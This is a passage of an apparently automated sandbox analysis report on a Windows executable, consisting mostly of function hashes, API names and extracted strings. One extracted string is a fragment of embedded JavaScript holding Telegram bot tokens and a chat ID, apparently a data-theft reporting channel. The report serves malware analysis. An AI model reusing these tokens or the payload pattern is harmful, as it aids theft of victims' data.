                                                                                                                                                                          • Opcode ID: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
                                                                                                                                                                          • Instruction ID: c8236d0372dbb4689eae5ac28a4cfa60458c961e82f6e6f3d4bc8225f9d4b7be
                                                                                                                                                                          • Opcode Fuzzy Hash: c928ed190427e62fc0dcd9eb6982712cfc3a0dea2194b9b1a4ba140830f2619c
                                                                                                                                                                          • Instruction Fuzzy Hash: 420122766290F147E69CD77D4C2987527C1C75A342B96813BFF8A823D4C92EDA00C730
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                          • Instruction ID: 7ea4670d26ae6472aad099a2a36f1a4ec80d6e8e7318a39b1f15c4adcf66dee0
                                                                                                                                                                          • Opcode Fuzzy Hash: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                          • Instruction Fuzzy Hash: 47F068717196559AEB989F6CA812E2977D0F708380F808179E58D83F34DB3C94519F54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                          • Instruction ID: 2a03f1590e855d5fe51bbb96bd5c92bfaaa788d2a1decfba9bfae79573792e9d
                                                                                                                                                                          • Opcode Fuzzy Hash: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 0DA00222A1EC82E4E646AB08E855C30E371FBE0301FC24132C00D510709F3CE980C730
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: : $All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
                                                                                                                                                                          • API String ID: 3668304517-1515510190
                                                                                                                                                                          • Opcode ID: 3370b769723b1030589e35f72584043052262ce1d88539523ffd59c732385f2c
                                                                                                                                                                          • Instruction ID: 9711088370a750e68a3f80bc811cae1c44403013db906e974d5b1eb8fc363645
                                                                                                                                                                          • Opcode Fuzzy Hash: 3370b769723b1030589e35f72584043052262ce1d88539523ffd59c732385f2c
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF1E362A0A78255EF14BB68D440BF9E761EF44798FC24132E95D076FAEE7CE588C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: for detail.$See
                                                                                                                                                                          • API String ID: 3668304517-4250990345
                                                                                                                                                                          • Opcode ID: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
                                                                                                                                                                          • Instruction ID: e54b497d004fdafd616ae922b491aac2eae50c099bf9d965ac6b7a2347f56db1
                                                                                                                                                                          • Opcode Fuzzy Hash: 11555719de460d759cd9ce52645ae0ad9069b738f064280b2c47e42908dc881e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF11562F29B8149FB04EB68D004BACA362EB457E4F915731DE6C13AF6DE78D1C59320
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 3668304517-3574094325
                                                                                                                                                                          • Opcode ID: 932c06fcef72250b163ce193bd6e5a5cd41d62d2af461c2733232d11c6484593
                                                                                                                                                                          • Instruction ID: b4f6339e4c34e5da68f61b56ecb79f746b0dba86556102d296cc98aab74f4645
                                                                                                                                                                          • Opcode Fuzzy Hash: 932c06fcef72250b163ce193bd6e5a5cd41d62d2af461c2733232d11c6484593
                                                                                                                                                                          • Instruction Fuzzy Hash: 7122D222B1AB8285EB10EF68D4407FDA3B0FB44798F954231DA5C57ABAEF78D541C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: 0$0$0
                                                                                                                                                                          • API String ID: 3215553584-3137946472
                                                                                                                                                                          • Opcode ID: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                          • Instruction ID: 13569a08fc81c27764768790cf4f9bbf6f17b70cdc5f932aacb11dec268f8ca9
                                                                                                                                                                          • Opcode Fuzzy Hash: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 59E10B3294F64745F769BF2C8098ABDAB93DB12780FD74031C64D473B2CE2DAA599324
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                          • API String ID: 3702003507-1866435925
                                                                                                                                                                          • Opcode ID: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
                                                                                                                                                                          • Instruction ID: 0de12f24bea2b54bbcd0e6d4f8750be942db36d34df388a5aab143dd66856fd8
                                                                                                                                                                          • Opcode Fuzzy Hash: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
                                                                                                                                                                          • Instruction Fuzzy Hash: 07C15D3260AB8181EB24EF19E4507AAF7A1FB84B84F958132DA8D47BB5DF3DD449C710
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                          • String ID: bad locale name$false$true
                                                                                                                                                                          • API String ID: 4121308752-1062449267
                                                                                                                                                                          • Opcode ID: abc6e7851ce84216ffbade7b44a9e1a5858d628bc4b5839a5764da963fe7ad66
                                                                                                                                                                          • Instruction ID: 9e7c150fa80c79a1ba8bcc669bf36963b3a7aebfc5e20c1ccc4fa10e71a215f0
                                                                                                                                                                          • Opcode Fuzzy Hash: abc6e7851ce84216ffbade7b44a9e1a5858d628bc4b5839a5764da963fe7ad66
                                                                                                                                                                          • Instruction Fuzzy Hash: DD618232B0A74289FB15EFB8D450BBCB3A5AF40708F860035DE4C27AB6DE39A555D364
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                                          • String ID: ", "$: "
                                                                                                                                                                          • API String ID: 2261858363-747220369
                                                                                                                                                                          • Opcode ID: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
                                                                                                                                                                          • Instruction ID: ba4cf569f1eff9e6ee03411a2aa274dad59b5eb17fe5bb496ea8ee7b31e292c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c2c1f16b9bcb1608803fa57558e3b5461482a9100175eb3ba717f400800e487
                                                                                                                                                                          • Instruction Fuzzy Hash: 14D19F72B16B8185EB04EF69D0447ADA372EB44BC8F914432DA5D17BBADF39D980C350
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                          • String ID: replacement $Nothing found
                                                                                                                                                                          • API String ID: 4261731725-1856175495
                                                                                                                                                                          • Opcode ID: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
                                                                                                                                                                          • Instruction ID: f90d8188d437d7f51ef50166095255f2dddc33d0b8d0eb5afe9dca6b6c23ef22
                                                                                                                                                                          • Opcode Fuzzy Hash: fa8d2c0a2f398226edcdbe6cf9692cf2ad42a516f9cc044238f705f772e52f0e
                                                                                                                                                                          • Instruction Fuzzy Hash: 6FC1D472F1974585EB10EB69E0047ADA361EB857A4F914632DA6C27BF9DF3CE481C310
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                          • API String ID: 667068680-1247241052
                                                                                                                                                                          • Opcode ID: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                          • Instruction ID: 98541478b86e1cc8087499937f404775a4a040aefcb70db8a91e37ab8d07baaf
                                                                                                                                                                          • Opcode Fuzzy Hash: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                          • Instruction Fuzzy Hash: 44F0D464A1BB07A1EA04BB99F884870A3A0BF08782FC20434C81D83330EF3CA0958B60
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                          • Opcode ID: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                          • Instruction ID: e6b59b252971dee94c8141b63eaa2cd4431175d665340731398fa1ce5107cfdd
                                                                                                                                                                          • Opcode Fuzzy Hash: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                          • Instruction Fuzzy Hash: C1D1C432A097418AEB20EF69D4487ADB7A1FB45798F910135DE8D577B6CF38E281C710
                                                                                                                                                                          APIs
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7ABC591C8,?,?,?,?,00007FF7ABC51FDD,?,?,?,?,00007FF7ABC3EAF8), ref: 00007FF7ABC58A6C
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7ABC591C8,?,?,?,?,00007FF7ABC51FDD,?,?,?,?,00007FF7ABC3EAF8), ref: 00007FF7ABC58A78
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                          • Opcode ID: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                          • Instruction ID: 94289806e8c5e61ca4643a149d70c8fa583d99479519c28dd3c9acd7e98ce22f
                                                                                                                                                                          • Opcode Fuzzy Hash: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                          • Instruction Fuzzy Hash: 91412421B1B60241FA16EB1E9890E79A791BF44BE0F8A0334DD1D873B4EE3CE5458720
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                          • String ID: f$p$p
                                                                                                                                                                          • API String ID: 3215553584-1995029353
                                                                                                                                                                          • Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                          • Instruction ID: fe2bc365a4d49583b2bebf795b07a66cec81b956944aabd3d4c083bd826ea4b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                          • Instruction Fuzzy Hash: 19128271A4A14386FB20BE18D584A7AF6A1FB40754FD64735D68A47AF4DF3CE980CB20
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                          • String ID: bad locale name
                                                                                                                                                                          • API String ID: 1386471777-1405518554
                                                                                                                                                                          • Opcode ID: e62eab9b983b0a96b3a03dab26092bc602c17f6bae3189a7fb5b30f2c2a23aa8
                                                                                                                                                                          • Instruction ID: 5dba704f9fce7bd195aea87e4c9e40ca5c19239f658711d150003e0a6ba58304
                                                                                                                                                                          • Opcode Fuzzy Hash: e62eab9b983b0a96b3a03dab26092bc602c17f6bae3189a7fb5b30f2c2a23aa8
                                                                                                                                                                          • Instruction Fuzzy Hash: 83517C22B0AB418AFB14EBA8D4506BCB361BF94748F854135DF4D26A76CF38E6568320
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481B1
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481BF
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481E9
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC48257
                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC48263
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                          • Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                          • Instruction ID: f48c21eb65a00820aa6f8df44051ed2656a3f171a55ac73a0532df0c2fe10151
                                                                                                                                                                          • Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
                                                                                                                                                                          • Instruction Fuzzy Hash: ED312B21B1BA4291EE21FB1AA404974A795FF44B60FDB0535DD2D47770DF3CE6408720
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
